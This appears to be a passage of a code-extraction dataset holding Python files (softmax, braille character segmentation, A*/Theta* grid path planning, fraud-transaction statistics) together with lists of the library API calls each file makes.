'np.ones', (['m', 'float'], {}), '(m, float)\n', (23698, 23708), True, 'import numpy as np\n'), ((24295, 24307), 'numpy.std', 'np.std', (['A', '(0)'], {}), '(A, 0)\n', (24301, 24307), True, 'import numpy as np\n'), ((3509, 3528), 'numpy.log', 'np.log', (['sampleprobs'], {}), '(sampleprobs)\n', (3515, 3528), True, 'import numpy as np\n'), ((7657, 7670), 'cmath.log', 'cmath.log', (['xi'], {}), '(xi)\n', (7666, 7670), False, 'import cmath\n'), ((19896, 19908), 'numpy.dot', 'np.dot', (['A', 'v'], {}), '(A, v)\n', (19902, 19908), True, 'import numpy as np\n'), ((20199, 20217), 'numpy.empty', 'np.empty', (['m', 'float'], {}), '(m, float)\n', (20207, 20217), True, 'import numpy as np\n'), ((24802, 24815), 'numpy.asarray', 'np.asarray', (['a'], {}), '(a)\n', (24812, 24815), True, 'import numpy as np\n'), ((6501, 6521), 'cmath.exp', 'cmath.exp', (['(a_i - b_i)'], {}), '(a_i - b_i)\n', (6510, 6521), False, 'import cmath\n'), ((6661, 6681), 'cmath.exp', 'cmath.exp', (['(b_i - a_i)'], {}), '(b_i - a_i)\n', (6670, 6681), False, 'import cmath\n'), ((21804, 21826), 'numpy.reshape', 'np.reshape', (['v', '(1, vm)'], {}), '(v, (1, vm))\n', (21814, 21826), True, 'import numpy as np\n'), ((21847, 21865), 'numpy.dot', 'np.dot', (['vcolumn', 'A'], {}), '(vcolumn, A)\n', (21853, 21865), True, 'import numpy as np\n'), ((21889, 21908), 'numpy.reshape', 'np.reshape', (['x', '(n,)'], {}), '(x, (n,))\n', (21899, 21908), True, 'import numpy as np\n'), ((22066, 22081), 'numpy.transpose', 
'np.transpose', (['x'], {}), '(x)\n', (22078, 22081), True, 'import numpy as np\n'), ((22023, 22038), 'numpy.transpose', 'np.transpose', (['v'], {}), '(v)\n', (22035, 22038), True, 'import numpy as np\n')]
|
import numpy as np
def softmax(x, axis=None):
    # Subtract the per-axis max before exponentiating for numerical stability.
    x_max = np.max(x, axis=axis, keepdims=True)
    e_x = np.exp(x - x_max)
    e_sum = np.sum(e_x, axis=axis, keepdims=True)
    return e_x / e_sum
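# Small self-check (added illustration, not part of the original snippet): with
# axis=1 each row of the result is a probability distribution, and shifting the
# logits by a constant does not change the output.
if __name__ == "__main__":
    logits = np.array([[1.0, 2.0, 3.0],
                       [10.0, 10.0, 10.0]])
    probs = softmax(logits, axis=1)
    print(probs)                  # rows sum to 1
    print(probs.sum(axis=1))      # -> [1. 1.]
    print(np.allclose(probs, softmax(logits + 100.0, axis=1)))  # -> True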
|
[
"numpy.max",
"numpy.sum",
"numpy.exp"
] |
[((57, 92), 'numpy.max', 'np.max', (['x'], {'axis': 'axis', 'keepdims': '(True)'}), '(x, axis=axis, keepdims=True)\n', (63, 92), True, 'import numpy as np\n'), ((101, 116), 'numpy.exp', 'np.exp', (['(x - max)'], {}), '(x - max)\n', (107, 116), True, 'import numpy as np\n'), ((127, 164), 'numpy.sum', 'np.sum', (['e_x'], {'axis': 'axis', 'keepdims': '(True)'}), '(e_x, axis=axis, keepdims=True)\n', (133, 164), True, 'import numpy as np\n')]
|
import cv2
import numpy as np
import statistics as stat
class optical_braille_recognition():
def __init__(self) -> None:
pass
def make_histogram_y(self, img):
        '''
        Organizes the horizontal projection data of the image
        Input:
            img -> Image array
        Output:
            hist -> Array with the horizontal projection histogram values
        '''
height, width = img.shape
hist = np.zeros(height)
for x in range(height):
for y in range(width):
if (img[x][y] == 1):
hist[x] += 1
return hist
def make_histogram_x(self, img):
        '''
        Organizes the vertical projection data of the image; this projection can
        only be computed if the input image contains a single line of braille
        characters
        Input:
            img -> Image array
        Output:
            hist -> Array with the vertical projection histogram values
        '''
height, width = img.shape
hist = np.zeros(width)
for x in range(height):
for y in range(width):
if (img[x][y] == 1):
hist[y] += 1
return hist
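    # Illustration of the two projections above (hypothetical 3x4 binary image):
    #     img = np.array([[0, 1, 1, 0],
    #                     [0, 0, 0, 0],
    #                     [0, 1, 0, 0]])
    # make_histogram_y(img) -> [2., 0., 1.]      (white dots per row)
    # make_histogram_x(img) -> [0., 2., 1., 0.]  (white dots per column)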
def get_delimiters(self, hist):
        '''
        Finds the vertical and horizontal delimiters of the positions where the
        braille character dots are located, based on the histogram
        Input:
            hist --> Array with the histogram values
        Output:
            delimiters --> Array with the dot position delimiters
        '''
delimiters = list()
for i in range(1, len(hist)-1):
if (hist[i] > 0) and (hist[i-1] == 0) and (hist[i+1] > 0):
delimiters.append(i-1)
if (hist[i] > 0) and (hist[i-1] > 0) and (hist[i+1] == 0):
delimiters.append(i+1)
return delimiters
def get_line_delimiters(self, delimiters):
        '''
        Finds the delimiters that determine where the lines of braille text in
        the image begin and end
        Input:
            delimiters --> Array with the dot position delimiters
        Output:
            line_delimiters --> Array with the line delimiters
        '''
distances = list()
for i in range(len(delimiters)-1):
distances.append(delimiters[i+1] - delimiters[i])
# print(f"{delimiters[i+1]} - {delimiters[i]}", end='\n')
distances = np.array(distances)
# print(distances)
        min = distances.min()  # distance between dot rows of the same character
        mode = stat.mode(distances)  # dot diameter
# print(mode)
if (mode - min) > 2:
limiar = min+2
else:
limiar = min+1
line_delimiters = list()
for i in range(1, len(delimiters)-2):
if (distances[i] > mode and distances[i+1] > limiar and distances[i-1] > limiar):
line_delimiters.append(delimiters[i])
line_delimiters.append(delimiters[i+1])
if i-1 == 0:
line_delimiters.append(delimiters[i-1])
if i+1 == len(delimiters)-2:
line_delimiters.append(delimiters[i+2])
return line_delimiters
def get_character_delimiters(self, delimiters):
        '''
        Uses the position delimiters to determine the delimiters of the braille
        characters by computing the distances between them
        Input:
            delimiters --> Array with the dot position delimiters
        Output:
            character_delimiters --> Array with the character delimiters
        '''
distances = list()
for i in range(len(delimiters)-1):
distances.append(delimiters[i+1] - delimiters[i])
# print(f"{delimiters[i+1]} - {delimiters[i]}", end='\n')
distances = np.array(distances)
min = distances.min()
        mode = stat.mode(distances)
if (mode - min) > 2:
limiar = min+2
else:
limiar = min+1
# print(limiar)
# print(distances)
character_delimiters = list()
for i in range(len(delimiters)-1):
            # Delimiting the characters that have dots in both columns
diameter = mode
if (distances[i] <= limiar and distances[i] != mode-1 ):
if i != 0:
diameter = delimiters[i] - delimiters[i-1]
character_delimiters.append(delimiters[i] - diameter)
character_delimiters.append(delimiters[i+1] + diameter)
            # Delimiting the characters at the start and end of a line
elif i == 0 and distances[i+1] > limiar:
                # Case where the character has dots only in the left column
if (distances[i+1] > mode+limiar):
character_delimiters.append(delimiters[i+1] + min + mode)
character_delimiters.append(delimiters[i])
                # Case where the character has dots only in the right column
else:
character_delimiters.append(delimiters[i] - min - mode)
character_delimiters.append(delimiters[i+1])
elif (i == len(distances)-1) and distances[i-1] > limiar:
                # Case where the character has dots only in the right column
if (distances[i-1] > mode+limiar and distances[i-3] > limiar):
character_delimiters.append(delimiters[i-1] - min - mode)
character_delimiters.append(delimiters[i])
                # Case where the character has dots only in the left column
else:
character_delimiters.append(delimiters[i+1] + min + mode)
character_delimiters.append(delimiters[i])
            # Delimiting the characters that have dots only in the left column
if (distances[i] > 1.5*mode+min):
if i > 1 and distances[i-2] > limiar:
character_delimiters.append(delimiters[i] + min + mode)
character_delimiters.append(delimiters[i-1])
            # Delimiting the characters that have dots only in the right column
elif ((distances[i] > 1.5*mode+min) and (i < len(delimiters)-3) and
(distances[i+2] > limiar)):
# if (i < len(delimiters_x)-3) and distances[i+2] > min+1:
character_delimiters.append(delimiters[i+2])
character_delimiters.append(delimiters[i+1] - min - mode)
# elif i == len(delimiters)-2:
# character_delimiters.append(delimiters[i+2])
# character_delimiters.append(delimiters[i+1] - min - mode)
            # Delimiting the blank (space) characters
if (distances[i] >= 3*mode+min):
character_delimiters.append(delimiters[i] + mode)
character_delimiters.append(delimiters[i+1] - mode)
return character_delimiters
def get_line_subimages(self, img, line_delimiters):
        '''
        Uses the line delimiters to crop the image into subimages, each one
        containing a single line of braille characters
        Input:
          img -> Array of the image to be cropped
          line_delimiters --> Array with the line delimiters
        Output:
          line_subimages --> Array with the subimages of the cropped lines
        '''
line_delimiters = sorted(line_delimiters)
line_subimages = list()
for i in range(len(line_delimiters)//2):
line_subimages.append(img[line_delimiters[2*i]:line_delimiters[2*i+1],:])
return line_subimages
def get_character_subimages(self, img, char_delimiters):
        '''
        Crops the image containing one line of braille characters into subimages,
        one per character, which are stored in an array in reading order
        Input:
          img --> Array of the image containing one line of characters
          char_delimiters --> Array with the character delimiters
        Output:
          char_subimages --> Array with the subimages of the characters
        '''
char_delimiters = sorted(char_delimiters)
for i in range(len(char_delimiters)):
if char_delimiters[i] < 0:
char_delimiters[i] = 0
char_subimages = list()
for i in range(len(char_delimiters)//2):
char_subimages.append(img[:,char_delimiters[2*i]:char_delimiters[2*i+1]])
return char_subimages
def optical_braille_recognition(self, img):
        '''
        Receives a preprocessed image containing braille text, detects the position
        of the characters in the image and, from that, builds a matrix of subimages
        containing one word of the text per row
        Input:
          img --> Array of the preprocessed image
        Output:
          subimages --> matrix of subimages, where each row holds the characters of
          one word
        '''
hist_y = self.make_histogram_y(img)
delimiters_y = self.get_delimiters(hist_y)
line_delimiters = self.get_line_delimiters(delimiters_y)
line_subimages = self.get_line_subimages(img, line_delimiters)
subimages = list()
for i in range(len(line_subimages)):
hist_x = self.make_histogram_x(line_subimages[i])
delimiters_x = self.get_delimiters(hist_x)
char_delimiters = self.get_character_delimiters(delimiters_x)
char_subimages = self.get_character_subimages(line_subimages[i], char_delimiters)
word_subimages = list()
for j in range(len(char_subimages)):
hist_x = self.make_histogram_x(char_subimages[j])
if np.max(hist_x) != 0:
word_subimages.append(char_subimages[j])
else:
subimages.append(word_subimages)
word_subimages = list()
if np.max(hist_x) != 0 and j == len(char_subimages)-1:
subimages.append(word_subimages)
word_subimages = list()
return subimages
def tilt_correction(self, img):
max = 0
rows, cols = img.shape
for theta in np.arange(-6, 6, 0.1):
Mr = cv2.getRotationMatrix2D( (cols/2, rows/2), theta , 1)
aux_img = cv2.warpAffine(img, Mr, (cols, rows))
hist_y = self.make_histogram_y(aux_img)
delimiters_y = self.get_delimiters(hist_y)
if len(delimiters_y) > max:
max = len(delimiters_y)
dst_img = aux_img
return dst_img
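# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original class): how the projection
# histogram and delimiter search above behave on a tiny binary image.
# Only numpy is needed.
if __name__ == "__main__":
    import numpy as np
    demo = np.zeros((4, 8), dtype=int)
    demo[1:3, 2:4] = 1                 # one braille "dot", two columns wide
    demo[1:3, 5:7] = 1                 # a second dot
    hist = demo.sum(axis=0)            # per-column counts, as computed above
    print(hist)                        # -> [0 0 2 2 0 2 2 0]
    # get_delimiters then returns the zero-valued columns bordering each run
    # of non-zero counts, i.e. [1, 4, 4, 7] for this histogram.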
|
[
"numpy.zeros",
"cv2.warpAffine",
"numpy.max",
"numpy.array",
"numpy.arange",
"statistics.mode",
"cv2.getRotationMatrix2D"
] |
[((467, 483), 'numpy.zeros', 'np.zeros', (['height'], {}), '(height)\n', (475, 483), True, 'import numpy as np\n'), ((1098, 1113), 'numpy.zeros', 'np.zeros', (['width'], {}), '(width)\n', (1106, 1113), True, 'import numpy as np\n'), ((2554, 2573), 'numpy.array', 'np.array', (['distances'], {}), '(distances)\n', (2562, 2573), True, 'import numpy as np\n'), ((2704, 2724), 'statistics.mode', 'stat.mode', (['distances'], {}), '(distances)\n', (2713, 2724), True, 'import statistics as stat\n'), ((3992, 4011), 'numpy.array', 'np.array', (['distances'], {}), '(distances)\n', (4000, 4011), True, 'import numpy as np\n'), ((4055, 4075), 'statistics.mode', 'stat.mode', (['distances'], {}), '(distances)\n', (4064, 4075), True, 'import statistics as stat\n'), ((10651, 10672), 'numpy.arange', 'np.arange', (['(-6)', '(6)', '(0.1)'], {}), '(-6, 6, 0.1)\n', (10660, 10672), True, 'import numpy as np\n'), ((10691, 10746), 'cv2.getRotationMatrix2D', 'cv2.getRotationMatrix2D', (['(cols / 2, rows / 2)', 'theta', '(1)'], {}), '((cols / 2, rows / 2), theta, 1)\n', (10714, 10746), False, 'import cv2\n'), ((10768, 10805), 'cv2.warpAffine', 'cv2.warpAffine', (['img', 'Mr', '(cols, rows)'], {}), '(img, Mr, (cols, rows))\n', (10782, 10805), False, 'import cv2\n'), ((10107, 10121), 'numpy.max', 'np.max', (['hist_x'], {}), '(hist_x)\n', (10113, 10121), True, 'import numpy as np\n'), ((10348, 10362), 'numpy.max', 'np.max', (['hist_x'], {}), '(hist_x)\n', (10354, 10362), True, 'import numpy as np\n')]
|
import heapq as hq
import math
import numpy as np
from models.geometry_utils import *
# TODO: Generalize to 3D?
class Node:
def __init__(self, pos, parent=None, g_cost=math.inf, f_cost=math.inf):
self.pos = pos
self.parent = parent
self.g_cost = g_cost
self.f_cost = f_cost
def __eq__(self, other):
return all(self.pos == other.pos)
def __le__(self, other):
if self.pos[0] == other.pos[0]:
return self.pos[1] <= other.pos[1]
else:
return self.pos[0] <= other.pos[0]
def __lt__(self, other):
if self.pos[0] == other.pos[0]:
return self.pos[1] < other.pos[1]
else:
return self.pos[0] < other.pos[0]
# TODO: Generalize to 3D
class GridMap:
# cell_size > 0; don't make cell_size too small
def __init__(self, bounds=((0.0, 0.0), (10.0, 10.0)), cell_size=0.1, quad=True):
self.bounds = bounds
self.cell_size = cell_size
self.quad = quad
self.Nx = math.ceil((bounds[1][0] - bounds[0][0]) / cell_size)
self.Ny = math.ceil((bounds[1][1] - bounds[0][1]) / cell_size)
pos = lambda i, j: np.array([bounds[0][0] + (i + 0.5) * cell_size, bounds[0][1] + (j + 0.5) * cell_size])
self.grid = [[Node(pos(i, j)) for j in range(self.Ny)] for i in range(self.Nx)]
# pos should be within bounds
def set_node(self, pos, parent, g_cost, f_cost):
i_x = math.floor((pos[0] - self.bounds[0][0]) / self.cell_size)
i_y = math.floor((pos[1] - self.bounds[0][1]) / self.cell_size)
self.grid[i_x][i_y].parent = parent
self.grid[i_x][i_y].g_cost = g_cost
self.grid[i_x][i_y].f_cost = f_cost
return self.grid[i_x][i_y]
# pos should be within bounds
def get_node(self, pos):
i_x = math.floor((pos[0] - self.bounds[0][0]) / self.cell_size)
i_y = math.floor((pos[1] - self.bounds[0][1]) / self.cell_size)
return self.grid[i_x][i_y]
def get_neighbours(self, node):
i_x = math.floor((node.pos[0] - self.bounds[0][0]) / self.cell_size)
i_y = math.floor((node.pos[1] - self.bounds[0][1]) / self.cell_size)
neighbours = []
for i in range(i_x - 1, i_x + 2):
for j in range(i_y - 1, i_y + 2):
if i == i_x and j == i_y:
continue
if self.quad:
if 0 <= i <= self.Nx - 1 and 0 <= j <= self.Ny - 1 and abs(i - i_x) + abs(j - i_y) <= 1:
neighbours.append(self.grid[i][j])
else:
if 0 <= i <= self.Nx - 1 and 0 <= j <= self.Ny - 1:
neighbours.append(self.grid[i][j])
return neighbours
class GraphSearch:
def __init__(self, graph, obstacles, margin):
self.graph = graph
self.obstacles = obstacles
self.margin = margin
def a_star(self, start_pos, goal_pos):
h_cost = lambda pos: np.linalg.norm(goal_pos - pos)
edge_cost = lambda n1, n2: np.linalg.norm(n1.pos - n2.pos)
openSet = []
start = self.graph.set_node(start_pos, None, 0.0, h_cost(start_pos))
goal = self.graph.get_node(goal_pos)
hq.heappush(openSet, (start.f_cost, start))
while len(openSet) > 0:
current = openSet[0][1]
if current == goal:
return self.reconstruct_path(current)
hq.heappop(openSet)
for n in self.graph.get_neighbours(current):
if self.check_collision(n.pos):
continue
g_score = current.g_cost + edge_cost(current, n)
if g_score < n.g_cost:
n_ = self.graph.set_node(n.pos, current, g_score, g_score + h_cost(n.pos))
if not n in (x[1] for x in openSet):
hq.heappush(openSet, (n_.f_cost, n_))
return []
def theta_star(self, start_pos, goal_pos):
h_cost = lambda pos: np.linalg.norm(goal_pos - pos)
edge_cost = lambda n1, n2: np.linalg.norm(n1.pos - n2.pos)
openSet = []
start = self.graph.set_node(start_pos, None, 0.0, h_cost(start_pos))
goal = self.graph.get_node(goal_pos)
hq.heappush(openSet, (start.f_cost, start))
while len(openSet) > 0:
current = openSet[0][1]
if current == goal:
return self.reconstruct_path(current)
hq.heappop(openSet)
for n in self.graph.get_neighbours(current):
if self.check_collision(n.pos):
continue
if (not current.parent is None) and self.line_of_sight(current.parent, n):
g_score = current.parent.g_cost + edge_cost(current.parent, n)
if g_score < n.g_cost:
n_ = self.graph.set_node(n.pos, current.parent, g_score, g_score + h_cost(n.pos))
# delete n from min-heap
for i in range(len(openSet)):
if openSet[i][1] == n:
openSet[i] = openSet[-1]
openSet.pop()
if i < len(openSet):
hq._siftup(openSet, i)
hq._siftdown(openSet, 0, i)
break
hq.heappush(openSet, (n_.f_cost, n_))
else:
g_score = current.g_cost + edge_cost(current, n)
if g_score < n.g_cost:
n_ = self.graph.set_node(n.pos, current, g_score, g_score + h_cost(n.pos))
# delete n from min-heap
for i in range(len(openSet)):
if openSet[i][1] == n:
openSet[i] = openSet[-1]
openSet.pop()
if i < len(openSet):
hq._siftup(openSet, i)
hq._siftdown(openSet, 0, i)
break
hq.heappush(openSet, (n_.f_cost, n_))
return []
# TODO: optimize
def line_of_sight(self, n1, n2):
e = self.graph.cell_size
div = np.linalg.norm(n2.pos - n1.pos) / e
for i in range(1, math.floor(div) + 1):
if self.check_collision((n2.pos * i + n1.pos * (div - i)) / div):
return False
return True
def check_collision(self, pos):
for o in self.obstacles:
A, b = o.get_convex_rep()
b = b.reshape((len(b),))
if all(A @ pos - b - self.margin * np.linalg.norm(A, axis=1) <= 0):
return True
return False
def reconstruct_path(self, node):
path = [node]
while not node.parent is None:
node = node.parent
path.append(node)
return [path[len(path) - i - 1] for i in range(len(path))]
def reduce_path(self, path):
red_path = []
if len(path) > 1:
for i in range(1, len(path)):
if (not path[i].parent.parent is None) and self.line_of_sight(path[i], path[i].parent.parent):
path[i].parent = path[i].parent.parent
else:
red_path.append(path[i].parent)
red_path.append(path[-1])
return red_path
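# ---------------------------------------------------------------------------
# Usage sketch (not part of the original module): run A* on an empty 10 m x
# 10 m grid. With no obstacles, check_collision always returns False and the
# planner simply walks the grid from start to goal. Assumes the
# models.geometry_utils import at the top of the file resolves.
if __name__ == "__main__":
    grid = GridMap(bounds=((0.0, 0.0), (10.0, 10.0)), cell_size=0.5, quad=True)
    planner = GraphSearch(grid, obstacles=[], margin=0.2)
    path = planner.a_star(np.array([0.5, 0.5]), np.array([9.5, 9.5]))
    print([tuple(node.pos) for node in path])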
|
[
"heapq.heappush",
"math.ceil",
"math.floor",
"heapq.heappop",
"heapq._siftdown",
"heapq._siftup",
"numpy.array",
"numpy.linalg.norm"
] |
[((1065, 1117), 'math.ceil', 'math.ceil', (['((bounds[1][0] - bounds[0][0]) / cell_size)'], {}), '((bounds[1][0] - bounds[0][0]) / cell_size)\n', (1074, 1117), False, 'import math\n'), ((1137, 1189), 'math.ceil', 'math.ceil', (['((bounds[1][1] - bounds[0][1]) / cell_size)'], {}), '((bounds[1][1] - bounds[0][1]) / cell_size)\n', (1146, 1189), False, 'import math\n'), ((1502, 1559), 'math.floor', 'math.floor', (['((pos[0] - self.bounds[0][0]) / self.cell_size)'], {}), '((pos[0] - self.bounds[0][0]) / self.cell_size)\n', (1512, 1559), False, 'import math\n'), ((1575, 1632), 'math.floor', 'math.floor', (['((pos[1] - self.bounds[0][1]) / self.cell_size)'], {}), '((pos[1] - self.bounds[0][1]) / self.cell_size)\n', (1585, 1632), False, 'import math\n'), ((1886, 1943), 'math.floor', 'math.floor', (['((pos[0] - self.bounds[0][0]) / self.cell_size)'], {}), '((pos[0] - self.bounds[0][0]) / self.cell_size)\n', (1896, 1943), False, 'import math\n'), ((1959, 2016), 'math.floor', 'math.floor', (['((pos[1] - self.bounds[0][1]) / self.cell_size)'], {}), '((pos[1] - self.bounds[0][1]) / self.cell_size)\n', (1969, 2016), False, 'import math\n'), ((2107, 2169), 'math.floor', 'math.floor', (['((node.pos[0] - self.bounds[0][0]) / self.cell_size)'], {}), '((node.pos[0] - self.bounds[0][0]) / self.cell_size)\n', (2117, 2169), False, 'import math\n'), ((2185, 2247), 'math.floor', 'math.floor', (['((node.pos[1] - self.bounds[0][1]) / self.cell_size)'], {}), '((node.pos[1] - self.bounds[0][1]) / self.cell_size)\n', (2195, 2247), False, 'import math\n'), ((3323, 3366), 'heapq.heappush', 'hq.heappush', (['openSet', '(start.f_cost, start)'], {}), '(openSet, (start.f_cost, start))\n', (3334, 3366), True, 'import heapq as hq\n'), ((4381, 4424), 'heapq.heappush', 'hq.heappush', (['openSet', '(start.f_cost, start)'], {}), '(openSet, (start.f_cost, start))\n', (4392, 4424), True, 'import heapq as hq\n'), ((1220, 1310), 'numpy.array', 'np.array', (['[bounds[0][0] + (i + 0.5) * cell_size, bounds[0][1] + (j + 0.5) * cell_size]'], {}), '([bounds[0][0] + (i + 0.5) * cell_size, bounds[0][1] + (j + 0.5) *\n cell_size])\n', (1228, 1310), True, 'import numpy as np\n'), ((3065, 3095), 'numpy.linalg.norm', 'np.linalg.norm', (['(goal_pos - pos)'], {}), '(goal_pos - pos)\n', (3079, 3095), True, 'import numpy as np\n'), ((3132, 3163), 'numpy.linalg.norm', 'np.linalg.norm', (['(n1.pos - n2.pos)'], {}), '(n1.pos - n2.pos)\n', (3146, 3163), True, 'import numpy as np\n'), ((3542, 3561), 'heapq.heappop', 'hq.heappop', (['openSet'], {}), '(openSet)\n', (3552, 3561), True, 'import heapq as hq\n'), ((4123, 4153), 'numpy.linalg.norm', 'np.linalg.norm', (['(goal_pos - pos)'], {}), '(goal_pos - pos)\n', (4137, 4153), True, 'import numpy as np\n'), ((4190, 4221), 'numpy.linalg.norm', 'np.linalg.norm', (['(n1.pos - n2.pos)'], {}), '(n1.pos - n2.pos)\n', (4204, 4221), True, 'import numpy as np\n'), ((4600, 4619), 'heapq.heappop', 'hq.heappop', (['openSet'], {}), '(openSet)\n', (4610, 4619), True, 'import heapq as hq\n'), ((6539, 6570), 'numpy.linalg.norm', 'np.linalg.norm', (['(n2.pos - n1.pos)'], {}), '(n2.pos - n1.pos)\n', (6553, 6570), True, 'import numpy as np\n'), ((6602, 6617), 'math.floor', 'math.floor', (['div'], {}), '(div)\n', (6612, 6617), False, 'import math\n'), ((3986, 4023), 'heapq.heappush', 'hq.heappush', (['openSet', '(n_.f_cost, n_)'], {}), '(openSet, (n_.f_cost, n_))\n', (3997, 4023), True, 'import heapq as hq\n'), ((5591, 5628), 'heapq.heappush', 'hq.heappush', (['openSet', '(n_.f_cost, n_)'], {}), '(openSet, (n_.f_cost, n_))\n', 
(5602, 5628), True, 'import heapq as hq\n'), ((6371, 6408), 'heapq.heappush', 'hq.heappush', (['openSet', '(n_.f_cost, n_)'], {}), '(openSet, (n_.f_cost, n_))\n', (6382, 6408), True, 'import heapq as hq\n'), ((6952, 6977), 'numpy.linalg.norm', 'np.linalg.norm', (['A'], {'axis': '(1)'}), '(A, axis=1)\n', (6966, 6977), True, 'import numpy as np\n'), ((5439, 5461), 'heapq._siftup', 'hq._siftup', (['openSet', 'i'], {}), '(openSet, i)\n', (5449, 5461), True, 'import heapq as hq\n'), ((5499, 5526), 'heapq._siftdown', 'hq._siftdown', (['openSet', '(0)', 'i'], {}), '(openSet, 0, i)\n', (5511, 5526), True, 'import heapq as hq\n'), ((6219, 6241), 'heapq._siftup', 'hq._siftup', (['openSet', 'i'], {}), '(openSet, i)\n', (6229, 6241), True, 'import heapq as hq\n'), ((6279, 6306), 'heapq._siftdown', 'hq._siftdown', (['openSet', '(0)', 'i'], {}), '(openSet, 0, i)\n', (6291, 6306), True, 'import heapq as hq\n')]
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from os.path import join, dirname, exists
from os import makedirs, pardir
FOLDER_REAL_DATA = join(dirname(__file__), 'real_data')
FOLDER_SIMULATOR_INPUT = join(dirname(__file__), 'simulator_input')
FOLDER_REAL_DATA_ANALYSIS = join(FOLDER_REAL_DATA, 'analysis')
FOLDER_SIMULATOR_LOG = join(pardir, 'experiments/results')
# create the above folders if they don't exist yet
for folder in [FOLDER_REAL_DATA, FOLDER_SIMULATOR_INPUT, FOLDER_SIMULATOR_LOG, FOLDER_REAL_DATA_ANALYSIS]:
if not exists(folder):
makedirs(folder)
FILE_ANONYMIZED_DATASET = join(FOLDER_REAL_DATA, 'anonymized_dataset.csv')
FILE_REAL_LOG = join(FOLDER_REAL_DATA, 'transaction_log.csv')
FILE_SIMULATOR_LOG = join(FOLDER_SIMULATOR_LOG, 'transaction_log.csv')
def get_dataset(file):
"""
Returns the dataset (full), and subsets for non-fraud and fraud only.
:param file:
:return:
"""
# get dataset from file
dataset01 = pd.read_csv(file)
# cast "date" column datetime objects
dataset01["Global_Date"] = pd.to_datetime(dataset01["Global_Date"])
dataset01["Local_Date"] = pd.to_datetime(dataset01["Local_Date"])
# for convenience split the dataset into non-fraud(0)/fraud(1)
dataset0 = dataset01[dataset01["Target"] == 0]
dataset1 = dataset01[dataset01["Target"] == 1]
# give the datasets names
dataset01.name = 'all'
dataset0.name = 'non-fraud'
dataset1.name = 'fraud'
return dataset01, dataset0, dataset1
def get_real_dataset():
file = join(FOLDER_REAL_DATA, 'transaction_log.csv')
return get_dataset(file)
def get_simulated_dataset(result_idx):
"""
Returns the dataset (full), and subsets for non-fraud and fraud only.
    :param result_idx: index of the simulated run whose transaction log should be loaded
:return:
"""
file = join(FOLDER_SIMULATOR_LOG, '{}_transaction_log.csv'.format(result_idx))
return get_dataset(file)
def get_real_data_stats():
datasets = get_real_dataset()
return get_data_stats(datasets)
def get_simulated_data_stats(result_idx):
datasets = get_simulated_dataset(result_idx)
return get_data_stats(datasets)
def get_data_stats(datasets):
data_stats_cols = ['all', 'non-fraud', 'fraud']
data_stats = pd.DataFrame(columns=data_stats_cols)
data_stats.loc['transactions'] = [d.shape[0] for d in datasets]
data_stats.loc['transactions/hour'] = [round(d['Local_Date'].apply(lambda x: x.hour).value_counts().sum()/24/366, 2) for d in datasets]
data_stats.loc['transactions/day'] = [round(d['Local_Date'].apply(lambda x: x.day).value_counts().sum() / 366, 2) for d in datasets]
data_stats.loc['transactions/week'] = [round(d['Local_Date'].apply(lambda x: x.week).value_counts().sum() / 52, 2) for d in datasets]
data_stats.loc['transactions/month'] = [round(d['Local_Date'].apply(lambda x: x.month).value_counts().sum() / 12, 2) for d in datasets]
data_stats.loc['cards'] = [len(d["CardID"].unique()) for d in datasets]
data_stats.loc['cards, single use'] = [sum(d["CardID"].value_counts() == 1) for d in datasets]
data_stats.loc['cards, multi use'] = [sum(d["CardID"].value_counts() > 1) for d in datasets]
cards_genuine = datasets[1]['CardID'].unique()
cards_fraud = datasets[2]['CardID'].unique()
data_stats.loc['fraud cards in genuine'] = ['-', '-', len(np.intersect1d(cards_genuine, cards_fraud)) / len(cards_fraud)]
data_stats.loc['first transaction'] = [min(d["Global_Date"]).date() for d in datasets]
data_stats.loc['last transaction'] = [max(d["Global_Date"]).date() for d in datasets]
data_stats.loc['min amount'] = [min(d["Amount"]) for d in datasets]
data_stats.loc['max amount'] = [max(d["Amount"]) for d in datasets]
data_stats.loc['avg amount'] = [np.average(d["Amount"]) for d in datasets]
data_stats.loc['num merchants'] = [len(d["MerchantID"].unique()) for d in datasets]
data_stats.loc['countries'] = [len(d["Country"].unique()) for d in datasets]
data_stats.loc['currencies'] = [len(d["Currency"].unique()) for d in datasets]
data_stats.loc['min trans/card'] = [min(d["CardID"].value_counts()) for d in datasets]
data_stats.loc['max trans/card'] = [max(d["CardID"].value_counts()) for d in datasets]
data_stats.loc['avg trans/card'] = [np.average(d["CardID"].value_counts()) for d in datasets]
return data_stats
def get_grouped_prob(group_by, col_name):
    grouped_prob = get_real_dataset()[0].groupby([group_by, col_name]).size()
grouped_prob = grouped_prob.groupby(level=0).apply(lambda x: x / sum(x))
return grouped_prob
def get_transaction_dist(col_name):
""" calculate fractions of transactions for given column """
    datasets = get_real_dataset()
    possible_vals = datasets[0][col_name].value_counts().unique()
    trans_count = pd.DataFrame(0, index=possible_vals, columns=['all', 'non-fraud', 'fraud'])
    trans_count['all'] = datasets[0][col_name].value_counts().value_counts()
    trans_count['non-fraud'] = datasets[1][col_name].value_counts().value_counts()
    trans_count['fraud'] = datasets[2][col_name].value_counts().value_counts()
trans_count = trans_count.fillna(0)
trans_count /= np.sum(trans_count.values, axis=0)
# save
trans_count.to_csv(join(FOLDER_SIMULATOR_INPUT, 'fract-dist.csv'.format(col_name)), index_label=False)
# print
print(col_name)
print(trans_count)
print("")
return trans_count
def plot_hist_num_transactions(trans_frac, col_name):
""" method to plot histogram of number of transactions for a column """
plt.figure(figsize=(10, 7))
for i in range(3):
plt.subplot(3, 1, i+1)
plt.bar(range(trans_frac.shape[0]), trans_frac.values[:, i], label=trans_frac.index[i])
plt.ylabel('num transactions')
if i == 2:
plt.xlabel(col_name)
plt.savefig(join(FOLDER_SIMULATOR_INPUT, '{}_num-trans_hist'.format(col_name)))
plt.close()
def plot_bar_trans_prob(trans_frac, col_name, file_name=None):
""" method to plot bar plot of number of transactions for a column """
plt.figure()
bottoms = np.vstack((np.zeros(3), np.cumsum(trans_frac, axis=0)))
for i in range(trans_frac.shape[0]):
plt.bar((0, 1, 2), trans_frac.values[i], label=trans_frac.index[i], bottom=bottoms[i])
plt.xticks([0, 1, 2], ['all', 'non-fraud', 'fraud'])
h = plt.ylabel('%')
h.set_rotation(0)
plt.title("{} Distribution".format(col_name))
plt.legend()
if not file_name:
file_name = col_name
plt.savefig(join(FOLDER_SIMULATOR_INPUT, '{}_num-trans_bar'.format(file_name)))
plt.close()
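# ---------------------------------------------------------------------------
# Usage sketch (not part of the original module): the plotting helper only
# needs a DataFrame with one column per dataset, so it can be tried without
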